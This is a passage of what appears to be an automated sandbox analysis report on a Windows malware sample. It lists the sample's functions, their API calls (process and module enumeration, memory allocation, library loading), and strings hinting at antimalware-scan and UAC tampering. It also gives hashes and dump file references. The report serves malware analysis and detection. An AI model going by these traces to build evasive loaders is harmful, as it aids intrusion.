                                                                                                                            • GetModuleFileNameA.KERNEL32(02980000,?,00000105), ref: 0298584A
                                                                                                                              • Part of subcall function 02985A90: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02980000,029AB790), ref: 02985AAC
                                                                                                                              • Part of subcall function 02985A90: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02980000,029AB790), ref: 02985ACA
                                                                                                                              • Part of subcall function 02985A90: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02980000,029AB790), ref: 02985AE8
                                                                                                                              • Part of subcall function 02985A90: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02985B06
                                                                                                                              • Part of subcall function 02985A90: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02985B95,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02985B4F
                                                                                                                              • Part of subcall function 02985A90: RegQueryValueExA.ADVAPI32(?,02985CFC,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02985B95,?,80000001), ref: 02985B6D
                                                                                                                              • Part of subcall function 02985A90: RegCloseKey.ADVAPI32(?,02985B9C,00000000,?,?,00000000,02985B95,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02985B8F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2796650324-0
                                                                                                                            • Opcode ID: 36ac8199cd3100c6d0ea6747034283b2de4f4045689bdbb239c39140d976698a
                                                                                                                            • Instruction ID: 765500925699401f60f236247a7108689fd286298b9b45876ee4e8585ba4ff1b
                                                                                                                            • Opcode Fuzzy Hash: 36ac8199cd3100c6d0ea6747034283b2de4f4045689bdbb239c39140d976698a
                                                                                                                            • Instruction Fuzzy Hash: CEE06DB1A002148BCB10EE58C8C4A5633D8AB08754F4A0961EC68CF24AD370D9188BD0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 02987D9C Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02987DB0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: FileWrite
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3934441357-0
                                                                                                                            • Opcode ID: 736f4f92db52b42fc2a1391f4de21fa5b41205fd5f72813ecabc44a8b4ec614d
                                                                                                                            • Instruction ID: bd2a84ff0d0895294c0e13a263d5c609859c5ba1bd10cca2141edc5fd63946ac
                                                                                                                            • Opcode Fuzzy Hash: 736f4f92db52b42fc2a1391f4de21fa5b41205fd5f72813ecabc44a8b4ec614d
                                                                                                                            • Instruction Fuzzy Hash: A5D05B763091507AD220A55E5C44EF75BDCCFC9771F14063DB568C7180D7208C018671
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 02987E18 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetFileAttributesA.KERNEL32(00000000,?,0299E0EE,ScanString,029E4344,029A8FEC,OpenSession,029E4344,029A8FEC,ScanString,029E4344,029A8FEC,UacScan,029E4344,029A8FEC,UacInitialize), ref: 02987E23
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AttributesFile
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3188754299-0
                                                                                                                            • Opcode ID: f576f8495b3edd4a8e24de7a91902ce1e57f9f8a29b3fb9936075822a1a21783
                                                                                                                            • Instruction ID: ddde7d95716119e10d36f2f313d89a52bfa02dba9424f7100ec20ab363cf4b5c
                                                                                                                            • Opcode Fuzzy Hash: f576f8495b3edd4a8e24de7a91902ce1e57f9f8a29b3fb9936075822a1a21783
                                                                                                                            • Instruction Fuzzy Hash: 1CC08CA6202300069A60B1FC0CC409E428C098423C33C1B3DB028DE2E2D32288122870
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 02987E3C Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetFileAttributesA.KERNEL32(00000000,?,029A1133,ScanString,029E4344,029A8FEC,OpenSession,029E4344,029A8FEC,OpenSession,029E4344,029A8FEC,ScanBuffer,029E4344,029A8FEC,ScanString), ref: 02987E47
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AttributesFile
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3188754299-0
                                                                                                                            • Opcode ID: 198306c4462bc0bb9e5a1539ed44b571103b139370df0eb3b7b09f60ce76aac9
                                                                                                                            • Instruction ID: c4e8f990124edb06549b0a971f4354e139e41ba8ad7778057e9f4acbf5102f4b
                                                                                                                            • Opcode Fuzzy Hash: 198306c4462bc0bb9e5a1539ed44b571103b139370df0eb3b7b09f60ce76aac9
                                                                                                                            • Instruction Fuzzy Hash: 89C08CA66023090E5E60B2FC1CC02E9428E099463833C2B21E028EE1E2D31298222820
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 02984C3C Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: FreeString
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3341692771-0
                                                                                                                            • Opcode ID: a5eb2145a2f9f3a0a257849b150a1d14aa2318bab57149dae1fca905b844e32d
                                                                                                                            • Instruction ID: 8823e9c79b5300a1f64ef39fcad795bfba069dc5ac8521781c7aad292224faa5
                                                                                                                            • Opcode Fuzzy Hash: a5eb2145a2f9f3a0a257849b150a1d14aa2318bab57149dae1fca905b844e32d
                                                                                                                            • Instruction Fuzzy Hash: D1C080B160023147FF31B65C9CC079562CCEF453E5F1C00A1D618D7240E760DC0087B5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 02984C60 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SysFreeString.OLEAUT32(0299D42C), ref: 02984C32
                                                                                                                            • SysReAllocStringLen.OLEAUT32(029A9E68,0299D42C,00000016), ref: 02984C7A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: String$AllocFree
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 344208780-0
                                                                                                                            • Opcode ID: 0aec7a72195ce8a2f02e67a76ce15a9c0b7882c7f493080007ec41662f53ab3b
                                                                                                                            • Instruction ID: 6990930d8e1ef917314f491906c8cdd6d6bf6d8713506dcb75d334462dffdc0c
                                                                                                                            • Opcode Fuzzy Hash: 0aec7a72195ce8a2f02e67a76ce15a9c0b7882c7f493080007ec41662f53ab3b
                                                                                                                            • Instruction Fuzzy Hash: 13D080745001435EDF3C771549049B661EEDDD030B74CFE5D99124B140F761C401CA36
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 029A9B54 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • timeSetEvent.WINMM(00002710,00000000,029A9B48,00000000,00000001), ref: 029A9B64
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Eventtime
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2982266575-0
                                                                                                                            • Opcode ID: 1ecf4a4c62aea22e303b25804970f665201f61ec254881f5bd691aff6286328f
                                                                                                                            • Instruction ID: a49edc407957baddb002a0a8a6490fd52ce9cb12a6f74c717127be548e773d32
                                                                                                                            • Opcode Fuzzy Hash: 1ecf4a4c62aea22e303b25804970f665201f61ec254881f5bd691aff6286328f
                                                                                                                            • Instruction Fuzzy Hash: D8C092F07E63007EFA106AB52CD2F73558DEB84B01F50181AB600EE2C1E9E2582016B0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 02984BFC Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SysAllocStringLen.OLEAUT32(00000000,?), ref: 02984C03
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocString
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2525500382-0
                                                                                                                            • Opcode ID: a58847c83cd719dccc7eadc7ea48a36911e6046ec6b401b7504d2a9bf001b2b2
                                                                                                                            • Instruction ID: 6f536117f8d94398c8b8491ed5f0d50a9c9b4ad9a5b4e8a15871426e1fa59921
                                                                                                                            • Opcode Fuzzy Hash: a58847c83cd719dccc7eadc7ea48a36911e6046ec6b401b7504d2a9bf001b2b2
                                                                                                                            • Instruction Fuzzy Hash: 25B0123860820358FB5433220E007B6008C1FD0295F8C24519F18D80C0FB01C002883B
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 02984C14 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 02984C1B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: FreeString
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3341692771-0
                                                                                                                            • Opcode ID: 7518974b7b8c9db37bd0fba7d8069a02315112198d91de4b777e2875ca661a51
                                                                                                                            • Instruction ID: 23903ec5c050cbdf1b1f0e006b014c5596c95867cc55300f45d3b4637762e0d0
                                                                                                                            • Opcode Fuzzy Hash: 7518974b7b8c9db37bd0fba7d8069a02315112198d91de4b777e2875ca661a51
                                                                                                                            • Instruction Fuzzy Hash: 6EA022BC0003230ACF0B332E000022E203FBFC03003CCC8E803000B000AF3A8000AE38
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 029815CC Relevance: 1.3, APIs: 1, Instructions: 38memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02981A03,?,02982000), ref: 029815E2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4275171209-0
                                                                                                                            • Opcode ID: f1c963e95d0fdaf98c9baaf98bb5c2f04b08466af05229b288d18ba443dd421e
                                                                                                                            • Instruction ID: 9afaa233de7acd0f6debcb70989a8fba78e27c076727012c004cd381813930e8
                                                                                                                            • Opcode Fuzzy Hash: f1c963e95d0fdaf98c9baaf98bb5c2f04b08466af05229b288d18ba443dd421e
                                                                                                                            • Instruction Fuzzy Hash: BAF037F0B453008BDF05DF7999423156BD6E789745F548579D60DDB298E77288028B00
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 02981682 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,02982000), ref: 029816A4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4275171209-0
                                                                                                                            • Opcode ID: e2ee779de501fecfbc3e4ccb885c337652da04c923376aae4a2db13408c15a75
                                                                                                                            • Instruction ID: 40c87468066ac73c2d1b2dae6cf60d352e0bfc2b4034d71954af76cf0ca1cc7f
                                                                                                                            • Opcode Fuzzy Hash: e2ee779de501fecfbc3e4ccb885c337652da04c923376aae4a2db13408c15a75
                                                                                                                            • Instruction Fuzzy Hash: F3F0B4F2B44795BBDB219F5ADC817A2BBA4FB40314F0501B9F94C9B340D771A8118B98
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 029816E6 Relevance: 1.3, APIs: 1, Instructions: 25COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 02981704
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: FreeVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1263568516-0
                                                                                                                            • Opcode ID: 62d7d5f28d9f8ccecee2e4e09ba2276eeecc480eeed70850dcbc7ea20adfd4ea
                                                                                                                            • Instruction ID: c3aa9b8a8e021dfbd5e1429de91ecd0f0ed3f8ff6da3c9b86cbfaaf8f3112531
                                                                                                                            • Opcode Fuzzy Hash: 62d7d5f28d9f8ccecee2e4e09ba2276eeecc480eeed70850dcbc7ea20adfd4ea
                                                                                                                            • Instruction Fuzzy Hash: 8BE0CDB5300301BFD7106B7D5D407227BDCEF84654F1C4879F549DB241D270E8118B64
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Non-executed Functions

                                                                                                                            Function 02999B94 Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02999E1B,?,?,02999EAD,00000000,02999F89), ref: 02999BA8
                                                                                                                            • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02999BC0
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02999BD2
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02999BE4
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02999BF6
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02999C08
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02999C1A
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Process32First), ref: 02999C2C
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02999C3E
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02999C50
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02999C62
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02999C74
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02999C86
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Module32First), ref: 02999C98
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02999CAA
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02999CBC
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02999CCE
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$HandleModule
                                                                                                                            • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                                                                            • API String ID: 667068680-597814768
                                                                                                                            • Opcode ID: ba97919021f4e5b72c44f396cbdc37391dbd9ccaa6543b76a9cdfefd444a4c00
                                                                                                                            • Instruction ID: e753ec16de842c3931447e0f3fe9ac7a7790ac6af1bc83706b4549436bb265fb
                                                                                                                            • Opcode Fuzzy Hash: ba97919021f4e5b72c44f396cbdc37391dbd9ccaa6543b76a9cdfefd444a4c00
                                                                                                                            • Instruction Fuzzy Hash: B831FDB0A852A4DFFF00AFB8D8C9E2933EDAF867107441969B429DF644E7749810CF51
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 029858CC Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 139stringlibraryfileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,02987338,02980000,029AB790), ref: 029858E9
                                                                                                                            • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 02985900
                                                                                                                            • lstrcpynA.KERNEL32(?,?,?), ref: 02985930
                                                                                                                            • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02987338,02980000,029AB790), ref: 02985994
                                                                                                                            • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02987338,02980000,029AB790), ref: 029859CA
                                                                                                                            • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02987338,02980000,029AB790), ref: 029859DD
                                                                                                                            • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02987338,02980000,029AB790), ref: 029859EF
                                                                                                                            • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02987338,02980000,029AB790), ref: 029859FB
                                                                                                                            • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02987338,02980000), ref: 02985A2F
                                                                                                                            • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02987338), ref: 02985A3B
                                                                                                                            • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02985A5D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                                                            • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                                                            • API String ID: 3245196872-1565342463
                                                                                                                            • Opcode ID: 266e5ab0769aff93166a824a94df68a1f92a7b7b50e46d271ae5dde388196dde
                                                                                                                            • Instruction ID: a6e680f17821c2d7c4fbb72142dcf6a25b37931aecff66a27730df54ba847e36
                                                                                                                            • Opcode Fuzzy Hash: 266e5ab0769aff93166a824a94df68a1f92a7b7b50e46d271ae5dde388196dde
                                                                                                                            • Instruction Fuzzy Hash: A9414C72D00219AFDB10EAE8CCC8AEEB7ADAF48354F4E45A5A149D7240E730DB498F54
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 02985B9C Relevance: 15.1, APIs: 10, Instructions: 98stringlibrarythreadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02985BAC
                                                                                                                            • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02985BB9
                                                                                                                            • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02985BBF
                                                                                                                            • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02985BEA
                                                                                                                            • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02985C31
                                                                                                                            • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02985C41
                                                                                                                            • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02985C69
                                                                                                                            • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02985C79
                                                                                                                            • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02985C9F
                                                                                                                            • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02985CAF
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                                                                            • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                            • API String ID: 1599918012-2375825460
                                                                                                                            • Opcode ID: ff9cdef5e101b3bd86c326f77e31ad3179ad4c9dbc2056fe31fd781e488937c1
                                                                                                                            • Instruction ID: 67094e6d957d7a5a555fbcd91ef9e39705753ee4432f7cf131361bfb657d8bc0
                                                                                                                            • Opcode Fuzzy Hash: ff9cdef5e101b3bd86c326f77e31ad3179ad4c9dbc2056fe31fd781e488937c1
